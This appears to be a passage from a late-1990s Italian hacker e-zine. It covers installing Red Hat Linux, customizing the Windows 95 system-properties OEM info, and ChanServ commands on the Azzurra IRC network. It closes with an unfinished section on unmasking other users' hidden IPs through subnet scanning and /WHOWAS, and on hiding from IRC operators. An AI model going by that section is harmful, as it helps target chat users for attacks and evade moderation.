Contiene la documentazione Linux. Contiene il "manuale in linea" di Linux. Contiene i file "spooling", ovvero in attesa di essere stampati o di essere trasferiti in rete. Contiene i comandi di amministrazione per l'avvio del sistema. Contiene file variabili, ad esempio i file delle caselle postali. Contiene le interfacce con i dispositivi, ad esempio i terminali e le stampanti. Contiene i file di configurazione del sistema e altri file di sistema. ;) Zinco ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ INSTALLAZIONE LINUX ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Il 1ø grande muro da abbattere per raggiungere la salvezza: La tanto famosa quanto ostica installazione del LinuxCome avevo gia' anticipato in un altro articolo scritto precedentemente da me medesimo, l'unicasoluzione per evitare di essere traghettatidall'ormai mitico Caronte Gates sul suo battello Wincazz su di un fiume di errori di sistema Wonder-Linux che non e' un nuovo tipo di reggisenoche tira su' e spinge verso l'interno bensi' unSistema operativo mooolto + affidabile di quello su citato e che io definirei quasi in-inchiodabile!! Unico grande problema di questo OS e' la sua grandecomplessita' sia nella configurazione che nellagestione.1øgrande passo e' ovviamente la sua installazioneormai diventata famosa tra i pischelleti chesi trovano davanti questo sistema ma che nonconoscono quasi per nulla il suo funzionamento. In questo articoletto vi descrivero' come abbatterequesto 1° muro......... Inanzi tutto voglio specificare che il metododi installazione da me desritto e' stato usatoper far insidiare la distribuzione Red Hatversione 5.2 di Linux. 1ø punto e' la creazione di un disco di boot.Per creare un disco di boot bisogna usare il proggie contenuto nel CD di nome rawrite.exe.Dopo averlofatto partire andrete a specificare un fileimmagine da cui creare il disco di boot. Es. d:\linux\images\boot.imgIl disco di boot se avrete specificato conesattezza il percorso del file .img sara'creato e potrete procedere con la formattazione del vostro HD e all'inserimento del discodi avvio (boot) del Linux. 2ø punto Fate partire il programma di installazionee come prima richiesta ci sara' da selezionare la lingua..non penso sia ardua la scelta....turco???poi il tipo di tastiera (it) ed ancora il tipo disupporto da cui verra' installato il S.O. 3ø Ora viene la parte un po' + complicata: la creazione delle partizioni Dovrete infatti creare altre 2 partizioniuna -linux Native ed una di supporto -linux swapper crearle hai una doppia scelta : FDISK o Disk DruidPer comodita' usiamo il vecchio, ma sempre valido,FDISK.i comandi essenziali sono questi: Comando Descrizione m d n t q w lista dei comandi cancella partizione crea nuova partizione specifica il tipo di partizione esci senza salvare esci salvando Adesso crea 2 nuove partizioni primarie, ti chiedera' un numero da dare alle partizioni e la loro grandezz da specificare in numeri di cilindri Es. dal cilindro500 al 570. Create le partizioni dovrete andargli a specificare il tipo ovviamente saranno una Linux Native e l'altra swap.Salva il tutto tramite il comando w.Ora clicka su ok e seleziona la partizione Native editalae immetti /.Seleziona la swap e spingi ok.Da ora in poi dovrebbe essere veramente facile, selezionai componenti da installare e segui le istruzioni.Ultimo ma decisivo passo e' quello di cestinare Findus 95.Tante grazie a tutti quelli che mi aiutano ed unFUCK ________ |____| n [(O--O)] n H _|\__/|__ H nHnn/ \____/ \nnHn To: BILL GATES !!! <VVVV / \ VVVV> \__/| | \_/ By Dante Alighieri ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ LOGHI OEM ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Allora , adesso un altro piccolo trukketto per Win , ma che ho testato solo sotto Win95 ma in teoria anke sotto il 98 dovrebbe funzionare...Si tratta solo e semplicemente di aggiungere le informazioni che volete allo schermo delle proprieta' del sistema. Insomma, da risorse del computer , se fate click con il tasto destro e scegliete proprieta' vedrete lo schermo del quale vi sto parlando. Bene, adesso aggiungiamo un paio di informazioni personali :-] Create un file di testo con il nome OEMINFO.INI e mettete queste righe : [general] Manufacturer= Model= [Support Information] Line1= Line2= Line3= Line4= Line5= Salvatelo in /windows/system e siete a posto! Magari se vi spiego il significato non sarebbe male , eh? Ok, da [general] a [Support Information] potete inserire i datio che verranno visualizzati nella finestra principale cioe' il nome del costruttore del pc ed il modello.Da [Support Information] in poi tutto il testo che scriverete sara' visualizzato in una finestra secondaria , accessibile cliccando su "Informazioni di supporto...". Ricordate che per ogni nuova linea dovete usare il commento iniziale "LineX=" dove X sta per il numero progressivo. Per non fare apparire la barra di scrolling del testo , limitatevi a 16 linee comunque per il testo inserito non ci sono limiti di lunghezza. Relativamente alla larghezza , invece , se vi e' possibile , non superate i 57 caratteri in modo da non far comparire la barra di scorrimento orizzontale.Bene , e fin qui non penso ci siano problemi...Ok, avete messo un paio di info in + , adesso provate anke ad aggiungere un logo.Create un file bitmap (*.bmp) che non superi i 180 pixel di larghezza ed i 114 di altezza. Chiamatelo OEMLOGO.BMP e mettetelo in /windows/system.Vedrete apparire l'immagine sotto il monitor in proprieta' del sistema , sormontata dalla scritta "Prodotto da:" ... Carino ,no? Tenete presente che se volete un logo con sfondo grigio uniforme al "grigio windows" il colore da usare e' esattamente 192.192.192 in RGB ovviamente... Se poi trovate ancora qualche altro trukketto se me lo fate sapere mi fate felice! per adesso e' tutto , RigoR MorteM SPP 98-99 ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ####COME REGISTRARE UN CANALE CON IL CHANSERV {e il nick con NickServ} E COME TROVARE l'IP NELLE RETI IRC CHE LO MASCHERANO by Newbie 1.1 (+ Max)#### Questo 'articolo' (mi vergogno un po' a chiamarlo cosi' visto il livello piu' che elevato degli altri articoli di NewBies...chiamiamolo 'quest'accozzaglia di nozioni che chiunque puo' trovare da solo ma che ho riunito qui per la comodita' di tutti'...) mi e' stato 'commissionato' tempo fa da ChRome; non si tratta di nulla di particolare, ma visto che a qualcuno interessava, eccolo qui: un grazie a [Max] per il suo pezzo sul /whowas e a N0body88 che ha insistito perche' lo scrivessi (scusa ancore per il ritardo...). L'articolo sarebbe dovuto essere molto piu' lungo e piu' esplicativo...ma una serie di casini incredibili (file corrotti, registro sputtanato, ecc. ecc.) mi hanno impedito di scriverlo come avrei voluto, mi dispiace. Ora cmq che l'ho finito, posso finalmente formattare tutto e mettermi Linux! :))) Tutto quello che scrivo e' pienamente valido per i server della rete di Azzurra (non la conoscete? Male! Molto male... ;) ma in generale anche su altre reti IRC... Consiglio quindi di accertarsi volta per volta dei servizi effettivamente disponibili. Mi era stato chiesto di scrivere un articolo su come usare ChanServ per creare e registrare canali, ma per essere piu' completo ho deciso di raccogliere TUTTI gli help del ChanServ e di tradurli assieme a qualche mio commento. Questo vuole essere una piccola guida per newbie all'uso di servizi spesso trascurati se non ignorati del tutto, eppure molto utili. Visto che il 90% degli utenti di una rete IRC non legge gli help...credo che questa guida avra' una sua utilita', tenendo anche conto del fatto che non tutti gli help possono essere loggati... Se notate errori, imprecisioni (che sicuramente ci saranno...) o volete inviarmi dei vostri commenti o suggerimenti, scrivete a [email protected], grazie {NON chiedetemi crack, please! Altrimenti vi faccio friggere l'hard disk con la sola imposizione delle mani!!! ^_^}. La Rete di Azzurra IRC Network: IRC.Jnet.it Roma IRC.net36.com NET36 irc sever IRC:myline.it Sintesi IRC.swappoint.com IRC.Azzurra.it Bologna s.r.l. Crotone Torino Azzurra IRC Server Verbania Xfiles.azzurra.com Verbania IRC.filmaker.it Bologna www2.leonet.it Firenze ==> Java chat + Proxy = Felicita' :) IRC.cervia.com Ravenna Ryoko.klis.com Canada IRC.theevilman.dynip.com IRC.swappoint.com -Servizi Disponibili: ChanServ Servizio NickServ Servizio MemoServ Servizio SeenServ Servizio HelpServ Servizio CYBCOP Servizio Canada Canada di registrazione canali di regisatrazione nicknames di messaggistica SEEN/WHOWAS utenti di aiuto sui comandi IRC di sicurezza e manutenzione /MSG /MSG /MSG /MSG /MSG /MSG ChanServ HELP NickServ HELP MemoServ HELP SeenServ HELP AdminServ HELP CYBCOP HELP Premessa: quello che diro' e' valido nel server IRC.Jnet.it e in altri server IRC, ma non ovunque....Per maggiori informazioni, leggetevi molto attentamente il MOTD (Message Of The Day), il testo che riceverete non appena connessi ad un server IRC....e verificate se anche li' e' possibile registrare nick, canali, ecc. ecc. In ogni caso dovrebbe essere sempre possibile tramite degli help conoscere tutti i vari comandi e nei casi estremi si puo' sempre ricorrere ai solerti (?) IrcOp (dai Deb non ti offendere, sto scherzando hihihihi ;-). _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ Come creare e registrare un canale. Creare un canale IRC e' una cosa semplicissima: basta entrare (/JOIN) in un canale non ancora esistente e lo avremo creato! Possiamo creare due tipi di canali: esistenti su tutta la rete o solo sul nostro server preferito, i primi cominceranno con # e i secondi con &. Nel resto dell'articolo parleremo solo dei primi, me tutte le info sono applicabili anche ai secondi. Supponiamo ad es. di voler creare il canale #chrome, non dovremo fare altro che digitare nel nostro client IRC: /JOIN #chrome per entrare e creare il canale #chrome! ^_^ Ovviamente quando usciremo dal suddetto canale (/PART) o ci disconnetteremo dal server IRC (/QUIT o /DISCONNECT), il canale morira' (sigh!). Come fare allora per impedirlo? Come dare vita eterna o quasi al canale dedicato al nostro beniamino? ^__^;;;;; Semplice: dobbiamo registrarlo. E' per questo che esiste il ChanServ. Per fare cio' dovremo inviare dei comandi particolari sotto forma di messaggi ad un ChanServ, cioe' ad un bot preposto a questo compito. Cosi' come si inviano messaggi privati agli altri chattatori tramite il comando /MSG, cosi' si possono inviare messaggi ai bot del server (ChanServer, NickServer, ecc.) e tramite i suddetti messaggi impartire loro dei comandi, purche' si segua la giusta sintassi. Registrare un canale e' anche utile per impedire a terzi di registrarlo e di estrometterci da esso. Supponiamo ad esempio che il nostro canale abbia il meritato successo e che un lamer invidioso voglia impadronirsene...bene, se non abbiamo registrato il canale sara' semplicissimo per lui farlo: non dovra' fare altro che aspettare il momento in cui noi non siamo collegati al server e il canale e' vuoto, cioe' scomparso, per ricrearlo e registrarlo... ;__; Se invece noi lo registriamo, il lamer non potra' farci nulla e, sempre tramite l'amato/odiato ChanServ, potremo controllare il canale in maniera' piu' che completa, grazie ad una moltitudine di comandi che andro' ad elencare tra poco, ad es. potremo inserire seduta stante il lamer nella kick list, cosi' non appena provera' ad entrare nel canale per rompere le OO verra' immediatamente kickato e bannato fuori dal fido ChanServ. Il ChanServ e' il migliore amico del chanop, ma purtroppo e' un po' tonto e cosi' per fargli capire cosa vogliamo che faccia dovremo imparare la sua lingua...eccola spiegata passo per passo. <<<CHANSERV FOR DUMMIES>>> ====================================== Qui di seguito raccolgo e traduco tutti gli Help del ChanServ di IRC.Jnet.it aggiungendo qualche commento ed esempio pratico che illustri meglio le varie funzionalita'. Poiche' per registrare un canale bisogna pero' prima aver gia' registrato il tuo nick, vediamo brevemente come fare: /MSG NickServ register <nick> <password> Es.: /MSG NickServ register Newbie VivaMaster Dopo aver registrato il nick, chiunque voglia usarlo in quella rete IRC, dovra' entro 60 sec. da quando si connette inviare la password del nick al NickServ, cosa che si puo' fare in due modi: 1.) /MSG NickServ identify <password> 2.)/PASS <password> Bastera' che in mIRC Options/Perform inseriate uno di questi due comandi tra i comandi da eseguire appena si e' connessi e non dovrete preoccuparvi di altro. :) Il ChanServ e' un BOT ufficiale che si occupa delle gestione dei canali registrati. ====================================== Se si invia al ChanServ un messaggio di Help senza oggetto [ /MSG chanserv help ] si ottiene una serie di informazioni generali che traduco qua sotto: ***** ChanServ Help***** Chanserv permette agli utenti di registrare un canale. L'utilizzo di ChanServ consente al canale di essere controllato senza il bisogno di un bot e rende i takeovers {cioe' le 'conquiste' di un canale da parte di disturbatori esterni} del canale virtualmente impossibili. ChanServ abbandonera' un canale registrato se nessun AOp o SOp entrera' nel canale per 20 giorni. Comandi: REGISTER SOP AOP VOP AKICK DROP SET IDENTIFY INFO - Registra un canale; Modifica la lista degli SOp di un canale; Modifica la lista degli AOp di un canale; Modifica la lista degli VOp di un canale; Modifica la lista AKICK di un canale; Elimina un canale registrato; Cambia i settaggi di un canale; Identifica voi come fondatori del canale; Mostra informazioni sul canale; Altri Comandi del ChanServ: UNBAN ACCESS OP DEOP INVITE MDEOP MKICK MODE; Per informazioni dettagliate: /MSG ChanServ help <comando>. ***** Fine dell'Help ***** ====================================== Bene, esaminiamo adesso gli Help particolari di ogni comando e delle sue opzioni (se disponibili) dando qualche esempio pratico li' dove necessario. ====================================== /MSG ChanServ Help Register -ChanServ-ChanServ-ChanServ-ChanServ-ChanServ-ChanServ-ChanServ-ChanServcanale. -ChanServ- ***** _ChanServ_ Help ***** Comando - REGISTER Sintassi - REGISTER <canale> <password> <descrizione> Usato per registrare un canale con il ChanServ. Dopo aver registrato il tuo canale, un IRC bot non sara' necessario per mantenere gli op, e non dovrai preoccuparti di takeover (scalate, conquiste) del canale. Nota: Bisogna avere un nick registrato per poter registrare un Esempio: /msg ChanServ REGISTER #chrome echecazzo Canale dedicato al mitico chromino etc. etc. -ChanServ- ***** _End of Help_ ***** ====================================== /MSG ChanServ Help Sop -ChanServ-ChanServ-ChanServ-ChanServ-ChanServ-ChanServ-ChanServ- ***** _ChanServ_ Help ***** Comando - SOP Sintassi - SOP <canall> ADD <nick o mask> SOP <canale> DEL <nick o mask> SOP <canale> LIST SOP <canale> WIPE I Sop hanno il secondo maggior controllo di un canale (sono secondi solo al fondatore del canale) Il Fondatore e' l'unico che puo' aggiungere o eliminare un Sop. Il comando WIPE cancellera' l'intera lista degli AOp/VOp . Un Sop puo' add/del/wipe Aop e Vop. -ChanServ- Esempi: /msg ChanServ SOP #chrome add Black_Baron -ChanServ- /msg ChanServ SOP #chrome del *lamer@*.tin.it -ChanServ- /msg ChanServ SOP #chrome WIPE -ChanServ- ***** _End of Help_ ***** NOTA: Per poter ottenere la lista degli Sop di un canale bisogna essere Vop, Aop, Sop o fondatori del canale in questione. ====================================== /MSG ChanServ Help Aop -ChanServ- ***** _ChanServ_ Help ***** -ChanServ- Comando - AOP -ChanServ- Sintassi - AOP <canale> ADD <nick o mask> -ChanServ- AOP <canale> DEL <nick o mask> -ChanServ- AOP <canale > LIST -ChanServ- AOP <canale> WIPE -ChanServ- Gli AOp hanno il terzo livello di accesso in un canale -ChanServ- Solo un SOp o il fondatore di un canale -ChanServ- possono aggiungere o eliminare un AOp. -ChanServ- Il comando WIPE cancellera' l'intera -ChanServ- lista degli AOp . -ChanServ- Esempi: /MSG ChanServ AOP #chrome ADD venom -ChanServ- /MSG ChanServ AOP #chrome DEL *lamer@*tin.it -ChanServ- /MSG ChanServ AOP #chrome WIPE -ChanServ- ***** _End of Help_ ***** ====================================== /MSG ChanServ Help VOp -ChanServ- ***** ChanServ Help ***** -ChanServ- Comando - VOP -ChanServ- Sintassi - VOP <canale> ADD <nick o mask> -ChanServ- VOP <channel> DEL <nick o mask> -ChanServ- VOP <channel> LIST -Chanserv- VOP <channel> WIPE -ChanServ- I VOp hanno automaticamente voce in un canale. Voice (voce) +v e' la possibilita' di parlare in un canale moderato +m. -ChanServ- Esempi: /MSG ChanServ VOP #chrome ADD Master -Chanserv- /MSG ChanServ VOP #chrome DEL *lamer@*.tin.it -ChanServ- /MSG ChanServ VOP #chrome WIPE. -ChanServ- ***** Fine dell'Help ***** Vop = Voice Operator ====================================== /MSG ChanServ Help AKICK -ChanServ-ChanServ-ChanServ-ChanServ-ChanServ-ChanServ-ChanServ-ChanServ-ChanServ-ChanServ-ChanServ-ChanServ-ChanServ-ChanServ- ***** _ChanServ_ Help ***** Comando - AKICK Sintassi - AKICK <canale> ADD <nick o mask> AKICK <canale> DEL <nick o mask> AKICK <canale> LIST AKICK <canale> WIPE AKICK puo' essere usato dai SOp e dal fondatore del canale. Se un utente finisce nella lista akick del tuo canale e' immediatamente kickato e bannato fuori dal canale. Il comando WIPE cancellera' tutta la lista AKICK. Esempi: /msg ChanServ AKICK #chrome add lamer /msg ChanServ AKICK #chrome del *[email protected] /msg ChanServ AKICK #chrome WIPE ***** _End of Help_ ***** Insomma, la lista akick e' la lista nera del canale, dove vengono inseriti gli ospiti __indesiderati__. ====================================== /MSG ChanServ Help DROP -ChanServ-ChanServ-ChanServ-ChanServ- ***** ChanServ Help ***** Comando - DROP Sintassi - Drop <canale> Questo comando e' usato per eliminare un canale registrato. Solo l'utente con l'accesso da fondatore puo' farlo {Vedi /msg chanserv identify help}. -ChanServ- Esempio: /MSG ChanServ DROP #chrome -ChanServ- ***** Fine dell'Help ***** ====================================== /MSG ChanServ Help SET Questo comando e' molto importante e presenta numerose opzioni, esaminiamole: -ChanServ-ChanServ-ChanServ-ChanServ-ChanServ-ChanServ- ***** _ChanServ_ Help ***** Comando - SET Sintassi - SET <canale> <comando> [<valore>] Questo comando ti permette di cambiare i settaggi e le procedure di un canale. Devi identificarti come fondatore del canale per modificare ognuno di questi settaggi. -ChanServ-ChanServ-ChanServ-ChanServ-ChanServ-ChanServ-ChanServ-ChanServ-ChanServ-ChanServ-ChanServ-ChanServ-ChanServ<setting> -ChanServ- Settaggi disponibili: FOUNDER - Cambia il Fondatore del canale PASSWD - Cambia la Password del canale DESC - Cambia la descrizione del canale MLOCK - Setta il mode lock del canale MOTD - Registra il MOTD del canale URL - Cambia l'URL del canale EMAIL - Cambia l'indirizzo e-mail del canale MEMOLEVEL - Regola l'accesso per inviare memos al canale RESTRICT - Solo gli AOp e gli SOp possono restare nel canale OPGUARD - Solo gli AOp e gli SOp possono essere oppati TOPICLOCK - Solo il fondatore puo' cambiare il topic Per maggiori informazioni su un settaggio: /msg ChanServ help ***** _End of Help_ ***** Bene, ora vediamo gli help dei vari setting: ___________________________________________________ -ChanServ- ***** _ChanServ_ Help ***** -ChanServ- Comando - FOUNDER -ChanServ- Sintassi - SET <canale> FOUNDER <nuovo fondatore> -ChanServ- Utilizzato per cambiare il fondatore di un canale. -ChanServ- Il nuovo fondatore dev'essere un nick registrato. -ChanServ- Esempio: /MSG ChanServ SET #chrome FOUNDER Ramesse -ChanServ- ***** _End of Help_ ***** ___________________________________________________ -ChanServ- ***** _ChanServ_ Help ***** -ChanServ- Comando - PASSWD -ChanServ- Sintassi - SET <canale> PASSWD <nuova password> -ChanServ- Questo comando e' usato per cambiare -ChanServ- la password di un canale registrato. -ChanServ- Esempio: /MSG ChanServ SET #chrome PASSWD spippolo -ChanServ- ***** _End of Help_ ***** ___________________________________________________ -ChanServ- ***** _ChanServ_ Help ***** -ChanServ- Comando - MLOCK -ChanServ- Sintassi - SET <canale> MLOCK <modi> -ChanServ- Il fondatore di un canale puo' bloccare i modi di un canale -ChanServ- usando il comando mlock. Per bloccare un modo su un canale, -ChanServ- devi prima identificarti con il ChanServ per poter effettuare qualsiasi -ChanServ- cambiamento. Se hai dei modi bloccati sul tuo canale, solo il fondatore -ChanServ- o un SOp sara' in grado di cambiare i modi dei canali. -ChanServ- Esempio: /msg ChanServ SET #chrome MLOCK +stn -ChanServ- ***** _End of Help_ ***** Questo comando e' molto utile, perche' cosi' il fondatore impedisce ai vari chanop (eccetto i SOp) di cambiare certi modi 'lockati', ad es. puo' rendere il canale ad invito e lockare, bloccare questo modo, che puo' essere modificato solo da lui o dalle persone di cui si fida di piu'. __________________________________________________ -ChanServ- ***** _ChanServ_ Help ***** -ChanServ- Comando - MOTD -ChanServ- Sintassi - SET <canale> MOTD <messaggio> -ChanServ- Il fondatore di un canale puo' registrare un messaggio -ChanServ- che il ChanServ mostera' a tutti gli utenti che entreranno nel canale. -ChanServ- È il Message Of The Day: MOTD. -ChanServ- Esempio: /msg ChanServ SET #chrome MOTD Benvenuti in #ChRome il -ChanServ- canale dedicato al culto del celebre hacker degli SPP 8))) -ChanServ- ***** _End of Help_ ***** __________________________________________________ -ChanServ- ***** _ChanServ_ Help ***** -ChanServ- Comando - URL -ChanServ- Sintassi - SET <canale> URL <url> -ChanServ- Usato per cambiare l'URL del canale. -ChanServ- L' URL del tuo canale sara' disponibile a chiunque -ChanServ- richiedera' info sul tuo canale. -ChanServ- Esempio: /MSG ChanServ SET #chrome URL http://www.spp.com -ChanServ- ***** _End of Help_ ***** __________________________________________________ -ChanServ- ***** _ChanServ_ Help ***** -ChanServ- Comando - MEMOLEVEL -ChanServ- Sintassi - SET <canale> MEMOLEVEL <NONE|VOP|AOP|SOP|FOUNDER> -ChanServ- Questo setting ci permette di specificare -ChanServ- il livello di accesso richiesto per inviare memo al canale. -ChanServ- Quando lo regoli a nessuno i memo del canale sono disabilitati. -ChanServ- Se i memo vanno fuori controllo potresti desiderare di regolare il -ChanServ- il memolevel a SOp or founder (fondatore) almeno temporaneamente. -ChanServ- e lasciare calmare gli animi. -ChanServ- Esempio: /msg ChanServ SET #chrome MEMOLEVEL VOP -ChanServ- ***** _End of Help_ ***** _______________________________________________ -ChanServ- ***** _ChanServ_ Help ***** -ChanServ- Comando - RESTRICT -ChanServ- Sintassi - SET <canale> RESTRICT <ON/OFF> -ChanServ- Questo comando e' usato per permettere solo solo agli AOp/SOp/Vop di -ChanServ- entrare nel canale registrato. Chiunque altro sara' kickato e bannato -ChanServ- quando tentera' di entrare in un canale ristretto. -ChanServ- Esempio: /msg ChanServ SET #chrome RESTRICT on -ChanServ- ***** _End of Help_ ***** In pratica se si regola un canale come ristretto, chiunque non sia AOp/SOp/VOp finisce sulla akick list e non puo' entrare. ___________________________________________________ -ChanServ- ***** _ChanServ_ Help ***** -ChanServ- Comando - OPGUARD -ChanServ- Sintassi - OPGUARD <canale> <ON/OFF> -ChanServ- Se regoli OPGUARD ON solo chi e' nella tua lista Aop/Sop puo' -ChanServ- essere oppato nel canale. Chiunque altro venga oppato sara' -ChanServ- automaticamente deoppato dal ChanServ. -ChanServ- Esempio: /msg ChanServ SET #chrome OPGUARD ON -ChanServ- ***** _End of Help_ ***** __________________________________________________ -ChanServ- ***** _ChanServ_ Help ***** -ChanServ- Comando- TOPICLOCK -ChanServ- Sintassi - SET <canale> TOPICLOCK <ON/OFF> -ChanServ- Questo settaggio permettera' solo agli op che vuoi -ChanServ- di cambiare il topic. Se qcn che non e' autorizzato a cambiare il topic -ChanServ- del tuo canale prova a cambiarlo, ChanServ riportera' il topic -ChanServ- a quello che era originariamente. -ChanServ- Esempio: /msg ChanServ SET #chrome TOPICLOCK on -ChanServ- ***** _End of Help_ ***** __________________________________________________ ====================================== /MSG ChanServ Help IDENTIFY -ChanServ-ChanServ-Chanserv-ChanServ- ***** ChanServ Help ***** Comando - IDENTIFY Sintassi - IDENTIFY <canale> <password> Per ottenere l'accesso da fondatore ad un canale, usa il comando identify. Dopo esserti identificato in un canale hai il controllo completo su di esso. -ChanServ- Esempio: /MSG ChanServ IDENTIFY #chrome echecazzo -ChanServ- ***** Fine dell'Help ***** ====================================== /MSG ChanServ Help INFO Vediamo cosa si ottiene con /MSG ChanServ INFO #chrome -ChanServ- *** _#chrome_ is un canale dedicato al mitico ChRome, il canale e' attualmente ancora in costruzione... {Qui appare la DESC, cioe' la descrizione del canale che il fondatore o chi per lui ha scritto} -ChanServ- Founder : Newbie -ChanServ- Modelock : +rtn -ChanServ- Topic : (no topic is set) -ChanServ- Registered : 02/15/1999 10:27:40 -ChanServ- Last Opping : <unknown> -ChanServ- Options : Topic Retention -ChanServ- *** End of channel info *** Mi sembra tutto abbastanza chiaro. ====================================== /MSG ChanServ Help UNBAN -ChanServ- ***** ChanServ Help ***** -ChanServ- Comando - UNBAN -ChanServ- Sintassi - UNBAN <canale> -ChanServ- Utilizzato per cancellare la banlist di un canale. -ChanServ- Esempio: /MSG ChanServ UNBAN #chrome -ChanServ- ***** Fine dell'Help ***** ====================================== /MSG ChanServ Help ACCESS -ChanServ-ChanServ-ChanServ-ChanServ-ChanServ-ChanServ-ChanServ-ChanServ-ChanServ-ChanServ-ChanServ-ChanServ-ChanServ-ChanServ-ChanServ- ***** _ChanServ_ Help ***** Comando - ACCESS Sintassi - ACCESS <canale> Usa il comando ACCESS per scoprire che livello di accesso hai su un canale registrato Il ChanServ restituira' i seguenti valori: 6 - Identificato come il fondatore del canale 5 - Identified to the founders nick ??? 4 - Channel SOp 3 - Channel AOp 2 - Channel VOp 1 - Normal user 0 - AKICK'ed user Esempio: /msg ChanServ ACCESS #chrome ***** _End of Help_ ***** Facciamo qualche esempio: /MSG ChanServ ACCESS #lamers -ChanServ- ACC Newbie #lamers - Level 1 (Normal user, no access) /MSG ChanServ ACCESS #chrome -ChanServ- ACC Newbie #chrome - Level 6 (Identified to the channel founders) ====================================== /MSG ChanServ Help OP -ChanServ- Comando - OP -ChanServ- Sintassi - OP <canale> <nick> -ChanServ- Se sei un AOp in un canale, puoi usare ChanServ -ChanServ- per dare a te o agli altri utenti lo status di chanop -ChanServ- nel canale in questione. -ChanServ- Esempio: /msg ChanServ OP #ChRome Newbie -ChanServ- ***** _End of Help_ ***** ====================================== /MSG ChanServ Help DEOP -ChanServ- ***** _ChanServ_ Help ***** -ChanServ- Comando - DEOP -ChanServ- Sintassi - DEOP <canale> <nick> -ChanServ- Se hai il livello di Aop o Sop in un canale, puoi usare -ChanServ- questo comando per deoppare i chanop di quel canale. -ChanServ- Esempio: /msg ChanServ DEOP #chrome Lamer -ChanServ- ***** _End of Help_ ***** ====================================== /MSG ChanServ Help INVITE -ChanServ- Comando - INVITE -ChanServ- Sintassi - INVITE <canale> -ChanServ- Se hai un accesso AOp sul canale, puoi usare ChanServ per -ChanServ- autoinvitarti nel canale in questione. -ChanServ- Esempio : /MSG ChanServ INVITE #chrome -ChanServ- ***** Fine dell'Help ***** ====================================== /MSG ChanServ Help MDEOP -ChanServ- ***** _ChanServ_ Help ***** -ChanServ- Comando - MDEOP -ChanServ- Sintassi - MDEOP <canale> -ChanServ- Questo comando serve a deoppare ogni chanop in un canale -ChanServ- incluso te stesso. Devi essere un Sop del canale per usare questo -ChanServ- comando. MDEOP = Mass Deop. -ChanServ- Esempio: /msg ChanServ MDEOP #chrome -ChanServ- ***** _End of Help_ ***** ====================================== /MSG ChanServ Help MKICK -ChanServ- ***** ChanServ Help ***** -ChanServ- Comando - MKICK -ChanServ- Sintassi - MKICK <canale> -ChanServ- Usato per kickare qualsiasi utente dal tuo canale. Devi essere SOp -ChanServ- nel canale per poter usare questo comando. -ChanServ- Esempio: /MSG ChanServ MKICK #chrome -ChanServ- ***** Fine dell'Help ***** ====================================== /MSG ChanServ Help MODE -ChanServ- ***** _ChanServ_ Help ***** -ChanServ- Comando - MODE -ChanServ- Sintassi - MODE <canale> <modi> -ChanServ- Permette agli SOP di cambiare i modi del canale senza essere chanop di quel -ChanServ- canale. Se hai settato il modo -k non hai bisogno di conoscere la chiave (key) -ChanServ- del canale: metti invece una chiave qualsiasi (dummy key). -ChanServ- Esempio: /msg ChanServ MODE #chrome +s -ChanServ- /msg ChanServ MODE #chrome -k dummykey -ChanServ- ***** _End of Help_ ***** ====================================== ====================================== ====================================== ###Come scoprire l'ip nonostante sia nascosto### Su questi server IRC l'ultima parte dell'IP e' mascherata, per impedire nuke ed altri scherzetti... Gli IrcOp cmq il vostro Ip lo conoscono benissimo ed essendo severi non ci penseranno due volte prima di mettere il vostro dominio nelle k-line per un semplice clone o qualche bot innocente ;_; Sulla rete di Azzurra l'uso di Wingate e simili non e' consentito in alcun modo e non riuscirete ad usarli, in piu' c'e' il rischio di k-line. Quindi i problemi che ci troviamo ad affrontare sono due: 1.)come ottenere l'IP degli altri??? 2.)come nascondere il proprio agli altri (e soprattutto agli ircop)??? Ora passiamo alle soluzioni... 1.)TROVARE L'IP Se effettuate un /WHOIS sul nick della persona di cui volete l'ip, otterrete solo i primi tre numeri dell'ip...cio' nonostante non ci vuole poi molto a scansionare una subnet e gli IP di altra gente della vostra sotto rete collegata in quel momento e che sta chattando su IRC potrebbero essere veramente pochi... Ma esistono altri trucchetti per risalire rapidamente all'ip senza dover usare nessuno scanner: A- /WHOWAS <Integrazione ad opera di [MAX]>: Molti server IRC non garantiscono nessun tipo di riservatezza per i dati personali e in perticolare per l'ip di una persona. E' il caso di irc.tin.it nel quale e' possibile grazie al comando /WHOIS implementato anche nel menu popup di mIRC risalire all'IP di una persona conoscendone il nick. Altri server invece adottano una diversa politica "nascondendo" l'ultimo byte dell'ip, oppure la parte meno significativa di un domain name quando esiste. Vediamo allora quali possono essere le conseguenze; 